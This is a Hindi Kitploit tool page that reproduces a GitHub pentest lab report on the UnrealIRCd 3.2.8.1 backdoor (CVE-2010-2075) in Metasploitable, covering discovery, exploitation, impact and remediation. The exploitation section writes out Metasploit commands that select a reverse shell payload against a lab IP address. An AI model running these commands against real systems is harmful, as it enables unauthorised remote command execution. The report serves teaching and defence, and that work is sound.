Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

फ़ीडसंपर्कगोपनीयता© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
unrealircd-backdoor-pentest-report — UnrealIRCd 3.2.8.1 बैकडोर (CVE-2010-2075) के लिए Metasploitable3 पर नियंत्रित पेनटेस्ट लैब रिपोर्ट, निवारण चरणों सहित। | Kitploit
उपकरण/GitHubGitHub/elazab2005/unrealircd-backdoor-pentest-report
टोहीभेद्यता स्कैनरभेद्यता विश्लेषणशोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षारेड टीमिंगलैब और अभ्यास

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
GitHub
elazab2005/unrealircd-backdoor-pentest-report

unrealircd-backdoor-pentest-report

UnrealIRCd 3.2.8.1 बैकडोर (CVE-2010-2075) के लिए Metasploitable3 पर नियंत्रित पेनटेस्ट लैब रिपोर्ट, निवारण चरणों सहित।

रिपॉजिटरी देखें
151 महीना पहलेअभी तक समीक्षित नहीं

🛡️ UnrealIRCd बैकडोर पेनेट्रेशन परीक्षण

एक नियंत्रित पेनेट्रेशन परीक्षण परियोजना जो एक पृथक प्रशिक्षण वातावरण में UnrealIRCd 3.2.8.1 बैकडोर (CVE-2010-2075) की पहचान करने, उसका शोषण करने और उसे सुधारने पर केंद्रित है।

अस्वीकरण: यह परियोजना विशेष रूप से शैक्षिक और अधिकृत सुरक्षा परीक्षण उद्देश्यों के लिए, जानबूझकर कमजोर बनाए गए प्रयोगशाला वातावरण के विरुद्ध आयोजित की गई थी। किसी भी अनधिकृत प्रणाली को लक्षित नहीं किया गया था।


📌 परियोजना अवलोकन

यह परियोजना एक कमजोर UnrealIRCd 3.2.8.1 सेवा के विरुद्ध एक संपूर्ण भेद्यता मूल्यांकन और शोषण कार्यप्रवाह प्रदर्शित करती है।

मूल्यांकन में निम्नलिखित शामिल हैं:

  • सेवा खोज और गणना
  • कमजोर UnrealIRCd सेवा की पहचान
  • उजागर IRC सेवा का सत्यापन
  • Metasploit का उपयोग करके नियंत्रित शोषण
  • साक्ष्य संग्रह
  • सुरक्षा सुधार और हार्डनिंग
  • तकनीकी पेनेट्रेशन परीक्षण दस्तावेज़ीकरण

लक्ष्य

आइटमविवरण
लक्ष्यMetasploitable प्रयोगशाला वातावरण
लक्ष्य IP10.10.10.13
कमजोर सेवाUnrealIRCd
संस्करण3.2.8.1
प्रोटोकॉलIRC
पोर्ट6667/TCP
भेद्यताUnrealIRCd बैकडोर
CVECVE-2010-2075
गंभीरतागंभीर

NIST के राष्ट्रीय भेद्यता डेटाबेस के अनुसार, प्रभावित UnrealIRCd 3.2.8.1 वितरणों में एक बाह्य रूप से प्रस्तुत संशोधन शामिल था जो दूरस्थ हमलावरों को मनमाने कमांड निष्पादित करने की अनुमति दे सकता था।


🎯 उद्देश्य

इस मूल्यांकन के प्राथमिक उद्देश्य निम्नलिखित थे:

  1. लक्ष्य पर उजागर सेवाओं की पहचान करना।
  2. निर्धारित करना कि क्या UnrealIRCd सेवा कमजोर थी।
  3. नियंत्रित शोषण के माध्यम से भेद्यता को सत्यापित करना।
  4. सफल शोषण के संभावित प्रभाव का आकलन करना।
  5. तकनीकी साक्ष्य का दस्तावेज़ीकरण करना।
  6. उचित सुधार उपाय लागू करना।
  7. सत्यापित करना कि कमजोर सेवा सुरक्षित या अक्षम कर दी गई थी।

🧰 उपयोग किए गए उपकरण

उपकरणउद्देश्य
Nmapपोर्ट स्कैनिंग और सेवा गणना
NetcatTCP सेवा कनेक्टिविटी परीक्षण
Metasploit Frameworkनियंत्रित शोषण
Linux CLIसिस्टम सत्यापन और हार्डनिंग
UFWफ़ायरवॉल कॉन्फ़िगरेशन
Pythonसहायक सुरक्षा/परीक्षण कार्य

🔎 कार्यप्रणाली

मूल्यांकन ने एक सरलीकृत पेनेट्रेशन परीक्षण कार्यप्रवाह का पालन किया:

Reconnaissance
      ↓
Service Enumeration
      ↓
Vulnerability Identification
      ↓
Exploitation
      ↓
Evidence Collection
      ↓
Impact Assessment
      ↓
Remediation
      ↓
Verification

1. 🔍 सेवा खोज

पहला चरण लक्ष्य होस्ट पर उजागर सेवाओं की पहचान करना था।

मूल्यांकन ने निम्नलिखित पोर्ट पर सुन रही एक IRC सेवा की पहचान की:

TCP/6667

सेवा UnrealIRCd 3.2.8.1 से जुड़ी थी, जो बैकडोर भेद्यता से प्रभावित होने के लिए जाना जाने वाला संस्करण है।

साक्ष्य

Port Scan

चित्र 1 — पोर्ट और सेवा गणना

TCP/6667 की खोज ने प्रारंभिक संकेत प्रदान किया कि एक IRC सेवा उजागर थी और आगे की जांच की आवश्यकता थी।


2. 🚨 भेद्यता पहचान

पहचाना गया UnrealIRCd संस्करण CVE-2010-2075 से जुड़ा था।

यह भेद्यता केवल एक पारंपरिक सॉफ़्टवेयर बग नहीं है। प्रभावित संग्रह में एक दुर्भावनापूर्ण संशोधन/बैकडोर था जिसने दूरस्थ कमांड निष्पादन सक्षम किया। NVD इस मुद्दे को DEBUG3_DOLOG_SYSTEM मैक्रो में बाह्य रूप से प्रस्तुत ट्रोजन हॉर्स के रूप में वर्णित करता है।

Rapid7 का Metasploit दस्तावेज़ीकरण संबंधित मॉड्यूल की पहचान इस प्रकार करता है:

exploit/unix/irc/unreal_ircd_3281_backdoor

और इसे प्रभावित UnrealIRCd 3.2.8.1 संग्रहों में मौजूद दुर्भावनापूर्ण बैकडोर का शोषण करने वाले के रूप में वर्णित करता है।


3. 💥 नियंत्रित शोषण

भेद्यता को Metasploit Framework का उपयोग करके पृथक प्रयोगशाला वातावरण में सत्यापित किया गया था।

उदाहरण शोषण कार्यप्रवाह:

msfconsole

use exploit/unix/irc/unreal_ircd_3281_backdoor

set RHOSTS 10.10.10.13

set PAYLOAD cmd/unix/reverse

run

इस चरण का उद्देश्य यह सत्यापित करना था कि क्या दूरस्थ कमांड निष्पादन प्राप्त करने के लिए उजागर सेवा का दुरुपयोग किया जा सकता है।

Rapid7 इस Metasploit मॉड्यूल का दस्तावेज़ीकरण विशेष रूप से UnrealIRCd 3.2.8.1 बैकडोर के लिए करता है।

साक्ष्य

Exploitation Evidence

चित्र 2 — नियंत्रित शोषण साक्ष्य

साक्ष्य अधिकृत प्रयोगशाला लक्ष्य के विरुद्ध किए गए शोषण चरण को प्रदर्शित करता है।


4. ⚠️ सुरक्षा प्रभाव

बैकडोर का सफल शोषण एक हमलावर को प्रभावित UnrealIRCd प्रक्रिया के सुरक्षा संदर्भ में दूरस्थ रूप से कमांड निष्पादित करने की क्षमता प्रदान कर सकता है।

प्राप्त किए गए सटीक विशेषाधिकार उस खाते पर निर्भर करते हैं जिसके अंतर्गत IRC डेमॉन चल रहा है।

संभावित प्रभाव में निम्नलिखित शामिल हैं:

  • अनधिकृत कमांड निष्पादन
  • प्रारंभिक सिस्टम समझौता
  • समझौता किए गए खाते के लिए उपलब्ध फ़ाइलों तक पहुंच
  • आगे की स्थानीय गणना
  • संभावित विशेषाधिकार वृद्धि
  • संभावित स्थायित्व
  • यदि अतिरिक्त कमजोरियां मौजूद हैं तो संभावित पार्श्व गति

महत्वपूर्ण: संभावित प्रभाव को इस बात के प्रमाण के रूप में नहीं समझा जाना चाहिए कि इस मूल्यांकन के दौरान प्रत्येक सूचीबद्ध कार्रवाई की गई थी।

UnrealIRCd बैकडोर के लिए Nmap का दस्तावेज़ीकरण पुष्टि करता है कि भेद्यता का उपयोग दूरस्थ सिस्टम पर मनमाने कमांड निष्पादित करने के लिए किया जा सकता है।


5. 🛠️ सुधार

कमजोर UnrealIRCd इंस्टॉलेशन को उत्पादन वातावरण में उजागर नहीं रहना चाहिए।

अनुशंसित सुधार कार्रवाइयों में निम्नलिखित शामिल हैं:

तत्काल कार्रवाइयां

  1. समझौता/बैकडोर युक्त UnrealIRCd पैकेज हटाएं।
  2. इसे किसी वैध स्रोत से विश्वसनीय और सत्यापित संस्करण से बदलें।
  3. यदि IRC सेवा आवश्यक नहीं है तो उसे अक्षम करें।
  4. फ़ायरवॉल नियमों या नेटवर्क ACL का उपयोग करके IRC सेवाओं तक पहुंच प्रतिबंधित करें।
  5. समझौते के संकेतकों के लिए सिस्टम की समीक्षा करें।
  6. प्रमाणीकरण और सिस्टम लॉग की समीक्षा करें।
  7. यदि समझौते का संदेह है तो संभावित रूप से उजागर हुए क्रेडेंशियल बदलें।

नेटवर्क हार्डनिंग

यदि IRC आवश्यक नहीं है:

sudo ufw deny 6667/tcp

यदि सेवा आवश्यक है, तो पहुंच को व्यापक रूप से उजागर करने के बजाय विश्वसनीय नेटवर्क तक सीमित किया जाना चाहिए।

सेवा हार्डनिंग

पसंदीदा दृष्टिकोण यह है कि कमजोर सॉफ़्टवेयर को हटाया जाए और केवल नेटवर्क फ़िल्टरिंग पर निर्भर रहने का प्रयास करने के बजाय एक समर्थित, विश्वसनीय रिलीज़ तैनात की जाए।


6. ✅ सुधार साक्ष्य

उचित सुरक्षा नियंत्रण लागू करने के बाद सुधार चरण का दस्तावेज़ीकरण किया गया।

Remediation Evidence

चित्र 3 — सुधार / हार्डनिंग साक्ष्य

सुधार साक्ष्य को सुधारात्मक कार्रवाइयां लागू होने के बाद सेवा और/या फ़ायरवॉल कॉन्फ़िगरेशन की स्थिति प्रदर्शित करना चाहिए।


📊 जोखिम आकलन

श्रेणीआकलन
भेद्यताUnrealIRCd 3.2.8.1 बैकडोर
CVECVE-2010-2075
हमला वेक्टरनेटवर्क
प्रमाणीकरण आवश्यकबैकडोर ट्रिगर करने के लिए कोई प्रमाणीकरण आवश्यक नहीं है
उपयोगकर्ता सहभागिताआवश्यक नहीं
प्रभावदूरस्थ कमांड निष्पादन
गंभीरतागंभीर

बैकडोर को दूरस्थ कमांड निष्पादन की अनुमति देने के लिए डिज़ाइन किया गया था और यह सामान्य IRC उपयोगकर्ता प्रतिबंधों से स्वतंत्र रूप से संचालित हो सकता था, जिससे कमजोर सेवा का उजागर होना एक महत्वपूर्ण सुरक्षा जोखिम बन जाता है।


📁 परियोजना संरचना

unrealircd-backdoor-pentest-report/
│
├── README.md
├── UnrealIRCD_Backdoor_PenTest_Report.pdf
│
└── images/
    ├── port_scan.png
    ├── exploit_evidence.png
    └── remediation.png

📸 साक्ष्य सारांश

साक्ष्यविवरण
port_scan.pngउजागर IRC सेवा की खोज
exploit_evidence.pngनियंत्रित शोषण साक्ष्य
remediation.pngसुधार-पश्चात सुरक्षा/हार्डनिंग साक्ष्य

🧠 मुख्य सीख

यह मूल्यांकन कई महत्वपूर्ण पेनेट्रेशन परीक्षण अवधारणाओं को प्रदर्शित करता है:

टूल डाउनलोड करें